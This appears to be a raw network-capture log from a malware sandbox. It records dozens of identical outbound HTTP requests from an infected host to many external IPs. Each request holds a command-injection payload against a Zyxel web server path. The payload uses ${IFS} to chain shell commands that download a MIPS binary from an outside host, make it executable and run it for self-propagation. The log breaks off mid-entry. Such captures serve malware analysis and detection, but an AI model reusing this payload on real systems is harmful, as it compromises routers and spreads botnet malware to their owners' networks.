                                                Jan 29, 2024 07:07:59.570571899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7274192.168.2.2354016101.11.164.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570637941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7275192.168.2.233929245.175.220.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570671082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7276192.168.2.2355514204.154.191.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570724010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7277192.168.2.2340022159.88.211.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570749044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7278192.168.2.2349988222.96.252.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570811987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7279192.168.2.235956040.129.198.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570844889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7280192.168.2.235498418.154.234.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570898056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7281192.168.2.234906417.247.191.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570938110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7282192.168.2.233341017.99.102.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.570964098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7283192.168.2.2358962128.224.138.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571003914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7284192.168.2.233402843.36.1.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571021080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7285192.168.2.2360250152.160.47.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571068048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7286192.168.2.233385494.12.173.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571120977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7287192.168.2.233776281.103.156.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571156979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7288192.168.2.2354936176.70.192.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571203947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7289192.168.2.233952294.62.127.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571223974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7290192.168.2.2358936190.216.239.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571283102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7291192.168.2.2339030161.188.135.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571320057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7292192.168.2.2352614201.57.255.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571377039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7293192.168.2.2336006177.13.115.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571434975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7294192.168.2.2351780114.92.179.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571479082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7295192.168.2.233473427.213.171.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571517944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7296192.168.2.2338912187.12.20.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571559906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7297192.168.2.235736895.53.100.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571590900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7298192.168.2.234810040.170.131.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571630001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7299192.168.2.233319276.79.64.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571669102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7300192.168.2.2351092157.117.217.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571717024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7301192.168.2.2334876139.105.142.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571777105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7302192.168.2.235751896.255.68.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571809053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7303192.168.2.2357612220.188.19.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571851015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7304192.168.2.234796620.64.28.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571883917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7305192.168.2.235540035.126.69.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571916103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7306192.168.2.235378831.24.41.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.571957111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7307192.168.2.2347424196.176.22.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572000980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7308192.168.2.2339436160.14.152.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572041988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7309192.168.2.2334018180.209.207.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572107077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7310192.168.2.235339434.55.75.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572156906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7311192.168.2.2341138221.174.99.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572200060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7312192.168.2.2337078195.68.247.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572267056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7313192.168.2.234335891.14.234.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572309017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7314192.168.2.23357269.74.164.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572350025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7315192.168.2.2342908184.83.205.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572411060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7316192.168.2.233526025.4.154.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572424889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7317192.168.2.235577699.12.252.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572469950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7318192.168.2.234813895.145.254.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572523117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7319192.168.2.23595782.103.123.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572582006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7320192.168.2.235866846.234.83.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572617054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7321192.168.2.2346096168.177.217.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572668076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7322192.168.2.2359772213.71.128.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572710037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7323192.168.2.235499434.86.14.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572721004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7324192.168.2.233447881.231.234.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572803020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7325192.168.2.234523814.192.169.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572834969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7326192.168.2.2345934181.34.139.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572877884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7327192.168.2.234553059.5.139.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572918892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7328192.168.2.2348438181.39.226.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.572954893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7329192.168.2.235444250.242.57.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573016882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7330192.168.2.234177292.85.37.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573045015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7331192.168.2.23355442.87.114.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573060989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7332192.168.2.234008252.33.234.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573101997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7333192.168.2.2357156151.129.200.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573139906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7334192.168.2.235246266.146.147.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573194981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7335192.168.2.234538445.157.128.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573239088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7336192.168.2.2355654148.247.167.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:59.573277950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7337192.168.2.2359160206.122.68.118443
                                                TimestampBytes transferredDirectionData
